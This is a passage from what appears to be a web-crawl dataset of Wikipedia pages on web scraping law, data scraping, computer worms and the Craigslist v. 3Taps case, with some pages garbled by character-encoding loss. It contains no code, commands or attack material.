Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
404 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Citation_needed | To ensure that all Wikipedia content is verifiable, Wikipedia provides a means for anyone to question an uncited claim. If your work has been tagged, please provide a reliable source for the statement, and discuss if needed. You can add a citation by selecting from the drop-down menu at the top of the editing box. In markup, you can add a citation manually using ref tags. There are also more elaborate ways to cite sources. In wiki markup, you can question an uncited claim by inserting a simple Citation needed tag, or a more comprehensive Citation needed reason Your explanation here date August 2024 . Alternatively, fact and cn will produce the same result. These all display as: Example: 87 percent of statistics are made up on the spot. citation needed For information on adding citations in articles, see Help:Referencing for beginners. For information on when to remove this template messages, see Help:Maintenance template removal. A "citation needed" tag is a request for another editor to supply a source for the tagged fact: a form of communication between members of a collaborative editing community. It is never, in itself, an "improvement" of an article. Though readers may be alerted by a "citation needed" that a particular statement is not supported, and even doubted by some, many readers don't fully understand the community's processes. Not all tags get addressed in a timely manner, staying in place for months or years, forming an ever-growing Wikipedia backlog—this itself can be a problem. Best practice recommends the following: Before adding a tag, at least consider the following alternatives, one of which may prove much more constructive: There are 524,016 articles with "Citation needed" statements. You can browse the whole list of these articles at Category:All articles with unsourced statements. Frequently the authors of statements do not return to Wikipedia to support the statement with citations, so other Wikipedia editors have to do work checking those statements. With 524,016 articles containing statements that need WP:Verification, sometimes it's hard to choose which article to work on. The tool Citation Hunt makes that easier by suggesting random articles, which you can sort by topical category membership. |
405 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#See_also | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
406 | https://en.wikipedia.org/wiki/Data_scraping | https://www.worldcat.org/issn/1683-1470 | We’re sorry, but WorldCat does not work without JavaScript enabled. Please enable JavaScript on your browser. WorldCat is the world’s largest library catalog, helping you find library materials online. |
407 | https://en.wikipedia.org/wiki/Web_scraping | https://es.wikipedia.org/wiki/Web_scraping | Web scraping o raspado web es una t cnica utilizada mediante programas de software para extraer informaci n de sitios web. 1 Usualmente, estos programas simulan la navegaci n de un humano en la World Wide Web ya sea utilizando el protocolo HTTP manualmente, o incrustando un navegador en una aplicaci n. El web scraping est muy relacionado con la indexaci n de la web, la cual indexa la informaci n de la web utilizando un robot y es una t cnica universal adoptada por la mayor a de los motores de b squeda. Sin embargo, el web scraping se enfoca m s en la transformaci n de datos sin estructura en la web (como el formato HTML) en datos estructurados que pueden ser almacenados y analizados en una base de datos central, en una hoja de c lculo o en alguna otra fuente de almacenamiento. Alguno de los usos del web scraping son la comparaci n de precios en tiendas, la monitorizaci n de datos relacionados con el clima de cierta regi n, la detecci n de cambios en sitios webs y la integraci n de datos en sitios webs. Tambi n es utilizado para obtener informaci n relevante de un sitio a trav s de los rich snippets. Un raspador web utiliza la URL de un sitio web para extraer datos, almacen ndolos en una base de datos o hoja de c lculo local o central para un an lisis posterior. Este m todo de web scraping permite la extracci n de datos de manera eficiente y precisa. 2 En los ltimos a os el web scraping se ha convertido en una t cnica muy utilizada dentro del sector del posicionamiento web gracias a su capacidad de generar grandes cantidades de datos para crear contenidos de calidad. 3 Web scraping es el proceso de recopilar informaci n de forma autom tica de la Web. Es un campo con desarrollos activos, compartiendo un prop sito en com n con la visi n de la Web sem ntica. Utiliza soluciones pr cticas basadas en tecnolog as existentes que son com nmente ad hoc. Existen distintos niveles de automatizaci n que las existentes tecnolog as de Web Scraping pueden brindar: El web scraping podr a ir en contra de los t rminos de uso de algunos sitios webs. El cumplimiento de estos t rminos no est totalmente claro. 5 Mientras que la duplicaci n de expresiones originales puede ser en muchos casos ilegal, en Estados Unidos la corte dict en el caso Feist Publications v. Rural Telephone Service que la duplicaci n de hechos es permitida. Las cortes de Estados Unidos en ciertas ocasiones han reconocido que ciertos usos de los scrapers no deber an estar permitidos. Podr a considerarse una computadora como una propiedad personal, y de esta forma el scraper estar a entrando sin autorizaci n en esta propiedad. En el caso m s conocido, eBay vs Bidder's Edge, la segunda empresa tuvo que parar de realizar peticiones autom ticas al sitio de eBay. En este caso, Bidder's Edge pujaba autom ticamente por ciertos productos en este sitio. Uno de las principales pruebas de scraping involucr a American Airlines y a una empresa llamada FareChase. American Airlines gan esta batalla, haciendo que FareChase parara de vender un software que les permit a a los usuarios comparar tarifas en l nea si el sitio de American Airlines era incluido. La aerol nea dijo que las b squedas de FareChase entraban sin autorizaci n en los servidores cuando recopilaban la informaci n p blicamente disponible. Aunque las decisiones actualmente tomadas no son uniformes, es dif cil ignorar que un patr n est emergiendo, en el cual podemos ver que las cortes est n prepar ndose para proteger el contenido propietario en sitios webs comerciales, previendo de esta forma que este sea utilizado sin el consentimiento de los propietarios de los sitios. Sin embargo, el grado de protecci n de estos contenidos a n no est establecido, y depender del tipo de acceso realizado por los scrapers, de la cantidad de informaci n recopilada y del grado en el que afecten estos factores al propietario del sitio web. El administrador de un sitio web puede utilizar varias t cnicas para detener o disminuir los pedidos de los scrapers. Algunas t cnicas incluyen: La mayor a de estos m todos suponen una merma importante en la usabilidad del sitio web en cuesti n y los beneficios pueden ser muy puntuales. Pese al planteamiento negativo de ciertos sectores, el rastreo autom tico y scraping son muy importantes para mantener la historia de Internet. Las iniciativas de archivado web se basan mayoritariamente en esta t cnica. |
408 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=7 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
409 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_worm | A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. 1 It often uses a computer network to spread itself, relying on security failures on the target computer to access it. It will use this machine as a host to scan and infect other computers. When these new worm-invaded computers are controlled, the worm will continue to scan and infect other computers using these computers as hosts, and this behaviour will continue. 2 Computer worms use recursive methods to copy themselves without host programs and distribute themselves based on exploiting the advantages of exponential growth, thus controlling and infecting more and more computers in a short time. 3 Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer. Many worms are designed only to spread, and do not attempt to change the systems they pass through. However, as the Morris worm and Mydoom showed, even these "payload-free" worms can cause major disruption by increasing network traffic and other unintended effects. The term "worm" was first used in John Brunner's 1975 novel, The Shockwave Rider. In the novel, Nichlas Haflinger designs and sets off a data-gathering worm in an act of revenge against the powerful men who run a national electronic information web that induces mass conformity. "You have the biggest-ever worm loose in the net, and it automatically sabotages any attempt to monitor it. There's never been a worm with that tough a head or that long a tail 4 "Then the answer dawned on him, and he almost laughed. Fluckner had resorted to one of the oldest tricks in the store and turned loose in the continental net a self-perpetuating tapeworm, probably headed by a denunciation group "borrowed" from a major corporation, which would shunt itself from one nexus to another every time his credit-code was punched into a keyboard. It could take days to kill a worm like that, and sometimes weeks. 4 The second ever computer worm was devised to be an anti-virus software. Named Reaper, it was created by Ray Tomlinson to replicate itself across the ARPANET and delete the experimental Creeper program (the first computer worm, 1971). On November 2, 1988, Robert Tappan Morris, a Cornell University computer science graduate student, unleashed what became known as the Morris worm, disrupting many computers then on the Internet, guessed at the time to be one tenth of all those connected. 5 During the Morris appeal process, the U.S. Court of Appeals estimated the cost of removing the worm from each installation at between $200 and $53,000; this work prompted the formation of the CERT Coordination Center 6 and Phage mailing list. 7 Morris himself became the first person tried and convicted under the 1986 Computer Fraud and Abuse Act. 8 Conficker, a computer worm discovered in 2008 that primarily targeted Microsoft Windows operating systems, is a worm that employs 3 different spreading strategies: local probing, neighborhood probing, and global probing. 9 This worm was considered a hybrid epidemic and affected millions of computers. The term "hybrid epidemic" is used because of the three separate methods it employed to spread, which was discovered through code analysis. 10 Independence Computer viruses generally require a host program. 11 The virus writes its own code into the host program. When the program runs, the written virus program is executed first, causing infection and damage. A worm does not need a host program, as it is an independent program or code chunk. Therefore, it is not restricted by the host program, but can run independently and actively carry out attacks. 12 13 Exploit attacks Because a worm is not limited by the host program, worms can take advantage of various operating system vulnerabilities to carry out active attacks. For example, the "Nimda" virus exploits vulnerabilities to attack. Complexity Some worms are combined with web page scripts, and are hidden in HTML pages using VBScript, ActiveX and other technologies. When a user accesses a webpage containing a virus, the virus automatically resides in memory and waits to be triggered. There are also some worms that are combined with backdoor programs or Trojan horses, such as "Code Red". 14 Contagiousness Worms are more infectious than traditional viruses. They not only infect local computers, but also all servers and clients on the network based on the local computer. Worms can easily spread through shared folders, e-mails, 15 malicious web pages, and servers with a large number of vulnerabilities in the network. 16 Any code designed to do more than spread the worm is typically referred to as the "payload". Typical malicious payloads might delete files on a host system (e.g., the ExploreZip worm), encrypt files in a ransomware attack, or exfiltrate data such as confidential documents or passwords. citation needed Some worms may install a backdoor. This allows the computer to be remotely controlled by the worm author as a "zombie". Networks of such machines are often referred to as botnets and are very commonly used for a range of malicious purposes, including sending spam or performing DoS attacks. 17 18 19 Some special worms attack industrial systems in a targeted manner. Stuxnet was primarily transmitted through LANs and infected thumb-drives, as its targets were never connected to untrusted networks, like the internet. This virus can destroy the core production control computer software used by chemical, power generation and power transmission companies in various countries around the world - in Stuxnet's case, Iran, Indonesia and India were hardest hit - it was used to "issue orders" to other equipment in the factory, and to hide those commands from being detected. Stuxnet used multiple vulnerabilities and four different zero-day exploits (eg: 1 ) in Windows systems and Siemens SIMATICWinCC systems to attack the embedded programmable logic controllers of industrial machines. Although these systems operate independently from the network, if the operator inserts a virus-infected drive into the system's USB interface, the virus will be able to gain control of the system without any other operational requirements or prompts. 20 21 22 Worms spread by exploiting vulnerabilities in operating systems. Vendors with security problems supply regular security updates 23 (see "Patch Tuesday"), and if these are installed to a machine, then the majority of worms are unable to spread to it. If a vulnerability is disclosed before the security patch released by the vendor, a zero-day attack is possible. Users need to be wary of opening unexpected emails, 24 25 and should not run attached files or programs, or visit web sites that are linked to such emails. However, as with the ILOVEYOU worm, and with the increased growth and efficiency of phishing attacks, it remains possible to trick the end-user into running malicious code. Anti-virus and anti-spyware software are helpful, but must be kept up-to-date with new pattern files at least every few days. The use of a firewall is also recommended. Users can minimize the threat posed by worms by keeping their computers' operating system and other software up to date, avoiding opening unrecognized or unexpected emails and running firewall and antivirus software. 26 Mitigation techniques include: Infections can sometimes be detected by their behavior - typically scanning the Internet randomly, looking for vulnerable hosts to infect. 27 28 In addition, machine learning techniques can be used to detect new worms, by analyzing the behavior of the suspected computer. 29 A helpful worm or anti-worm is a worm designed to do something that its author feels is helpful, though not necessarily with the permission of the executing computer's owner. Beginning with the first research into worms at Xerox PARC, there have been attempts to create useful worms. Those worms allowed John Shoch and Jon Hupp to test the Ethernet principles on their network of Xerox Alto computers. 30 Similarly, the Nachi family of worms tried to download and install patches from Microsoft's website to fix vulnerabilities in the host system by exploiting those same vulnerabilities. 31 In practice, although this may have made these systems more secure, it generated considerable network traffic, rebooted the machine in the course of patching it, and did its work without the consent of the computer's owner or user. Regardless of their payload or their writers' intentions, security experts regard all worms as malware. Another example of this approach is Roku OS patching a bug allowing for Roku OS to be rooted via an update to their screensaver channels, which the screensaver would attempt to connect to the telnet and patch the device. 32 One study proposed the first computer worm that operates on the second layer of the OSI model (Data link Layer), utilizing topology information such as Content-addressable memory (CAM) tables and Spanning Tree information stored in switches to propagate and probe for vulnerable nodes until the enterprise network is covered. 33 Anti-worms have been used to combat the effects of the Code Red, 34 Blaster, and Santy worms. Welchia is an example of a helpful worm. 35 Utilizing the same deficiencies exploited by the Blaster worm, Welchia infected computers and automatically began downloading Microsoft security updates for Windows without the users' consent. Welchia automatically reboots the computers it infects after installing the updates. One of these updates was the patch that fixed the exploit. 35 Other examples of helpful worms are "Den Zuko", "Cheeze", "CodeGreen", and "Millenium". 35 Art worms support artists in the performance of massive scale ephemeral artworks. It turns the infected computers into nodes that contribute to the artwork. 36 |
410 | https://en.wikipedia.org/wiki/Data_scraping | https://ar.wikipedia.org/wiki/%D8%AA%D8%AC%D8%B1%D9%8A%D9%81_%D8%A7%D9%84%D8%A8%D9%8A%D8%A7%D9%86%D8%A7%D8%AA | ( : Data scrapping) . . . . . |
411 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Craigslist_v._3Taps | Craigslist Inc. v. 3Taps Inc., 942 F.Supp.2d 962 (N.D. Cal. 2013) was a Northern District of California Court case in which the court held that sending a cease-and-desist letter and enacting an IP address block is sufficient notice of online trespassing, which a plaintiff can use to claim a violation of the Computer Fraud and Abuse Act. 3Taps and PadMapper were companies that partnered to provide an alternative user interface for browsing Craigslist's housing ads. In doing so, they scraped Craigslist's site for data, which Craigslist did not approve of. Craigslist sent both companies a cease-and-desist letter and blocked their IP addresses, but this did not stop 3Taps from scraping through other IP addresses. Craigslist then sued, resulting in this case. In pre-trial motions 3Taps moved to dismiss the lawsuit on multiple grounds. In response, the court issued an order that set precedent on whether online hosts can use the CFAA to protect public data. The court held that sending a cease and desist letter and blocking a client's IP address are sufficient to qualify as notice under the Computer Fraud and Abuse Act. The court also held that 3Taps should have known that Craigslist was revoking its authorization to access the site. 1 The motion to dismiss was granted in part, and denied in part. On June 26, 2015, Craigslist came to separate settlements with 3Taps and Padmapper. 2 Both settlements required the defendants to permanently stop taking content from Craigslist, directly or indirectly. 3Taps paid $1,000,000 which Craigslist will donate to the EFF over ten years. Press coverage said that 3Taps would shut down, but as of July 16 it was still active with content from other sites. Craigslist is a website where users post and browse classified ads for, among other things, housing. PadMapper is a website specialized for browsing housing ads. PadMapper collected data from Craigslist and offered a map of the ads. 3 3Taps, a data scraping and hosting company, was also collecting data from Craigslist as part of a larger effort to gather public datasets. 4 On 22 June 2012, Craigslist sent a cease-and-desist letter to PadMapper, requesting that PadMapper stop scraping Craigslist's real estate listings. 3 Earlier in 2010, Craigslist's founder Craig Newmark had written that "we take issue with only services which consume a lot of bandwidth. 5 6 Craigslist also blocked PadMapper's and 3Taps's IP addresses from accessing its site, causing a significant drop in traffic to PadMapper. 3 3Taps continued to collect data from Craigslist by accessing the site through proxies, which allowed it to conceal its IP address and bypass Craigslist's block. 1 On 9 July 2012, PadMapper restored its site by getting its data from 3Taps instead of directly from Craigslist. 3 On July 16, 2012 Craigslist changed their terms of service to claim exclusive ownership, and exclusive right to enforce copyright of all postings made by users. Craigslist later rescinded these changes under pressure from the Electronic Frontier Foundation and others on August 8, 2012. 7 On 20 July 2012, Craigslist sued both PadMapper and 3Taps. Craigslist's complaint specified several reasons that 3Taps's continued use of Craigslist was unlawful: it was in violation of the Computer Fraud and Abuse Act; it was a breach of Craigslist's terms of service contract; it infringed on Craigslist's copyright of the listings; it was also contributory copyright infringement, since 3Taps shared the listings with PadMapper; and it infringed on and diluted Craigslist's trademark. 3 3Taps opposed the claim that it violated the CFAA. 4 On July 12, 2013 the Electronic Frontier Foundation filed an amicus brief in support of PadMapper and 3Taps. 8 9 On April 29, 2013 the court denied 3Taps' motion to dismiss Craigslists's CFAA claim. Most importantly the court held that Craigslist could continue its damages claim on posts made between July 16, 2012 and August 8, 2012. This was the period during which Craigslist had modified its terms of service to claim exclusive copyright on all postings. 7 3Taps provided three reasons for dismissing the claim which the court granted in part, and dismissed in part. 1 First, 3Taps argued that it had Craigslist's authorization to access the listings. The CFAA claim only applies to access of a protected computer system without authorization. It claimed that Craigslist was a public website, so anyone, including 3Taps, always had authorization. The court disagreed with this, stating that although Craigslist had granted 3Taps authorization initially, it then revoked the authorization. The court cited the case LVRC Holdings v. Brekka, in which the Ninth Circuit held that a former employee of an employer no longer had the employer's authorization to log into a work computer. Thus, the court held that 3Taps was unauthorized when it continued to access Craigslist after Craigslist rescinded the authorization. 1 Second, 3Taps suggested that Craigslist had set restrictions on how 3Taps must use the data, rather than restricting 3Taps's access to the data altogether. 3Taps cited the Ninth Circuit's sentiment from United States v. Nosal that violating a use policy was less severe than violating an access restriction. The argument in Nosal was that use policies could be complex, while denying access is simple and easy to follow. Thus, it would be dangerous for the court to criminalize use violations. 3Taps likened Nosal to its own case, alleging that Craigslist had taken measures to prevent 3Taps from using the listings in a certain way, rather than enacting a straightforward access revocation. The court viewed it differently: it considered Craigslist's cease-and-desist letter and IP blocking as access revocation. 1 The court pointed to language Craigslist's cease-and-desist letter affirming its interpretation, "You ... are hereby prohibited from accessing and using the CL Services for any reason. 10 Third, 3Taps warned of negative consequences of a decision that criminalizes a vague access restriction. It criticized Craigslist's enforcement as unclear about what exactly what it was prohibiting. 3Taps stated that an ordinary user would be more likely to misunderstand Cragslist's IP blocking than, for example, a system that required a password to gain access. The court found this not of much concern, highlighting that the personalized cease-and-desist letter and subsequent lawsuit provided adequate notice and information. This, the court found, would be sufficient in differentiating the case from more benign incidents where a user accidentally stumbles upon a protected system. The court admitted that it could not comment on whether it would consider Craigslist's IP blocking to be effective, but considered the fact that 3Taps went out of its way to bypass it as enough evidence that 3Taps acted without authorization. 1 3Taps also said that this decision would be a judgment on Internet culture. It promoted the idea of publicly accessible websites as a great social benefit, which a decision for permission controls would harm. It claimed that the CFAA was meant to protect private information against malicious hackers, and that it was not meant to limit the social benefit created by public data. It also predicted that a broad interpretation of the CFAA would limit competition and harm innovation, ultimately harming the openness of the Internet. The court refused to make a judgement on these matters; it considered those matters to be better handled through legislation. The court likened its decision to allowing a store to open itself to the public but also to ban a disruptive person if it needed to. 1 The court, in many instances, pointed to Craigslist's cease-and-desist letter as evidence that 3Taps knew that its authorization had been revoked. Law professor Eric Goldman questioned this, stating that cease-and-desist letters are wish lists by the senders. They describe what the sender wants to happen. As such they may easily overstate what a defendant must lawfully do. Goldman found it troubling that the court had treated the cease and desist letter as a legally-binding document that revoked 3Taps's authorization to access Craigslist. 11 12 Critics of the decision have called it anti-competitive. They claimed that this case sets a precedent that allows businesses to use the CFAA to keep public data away from competitors. Further, they 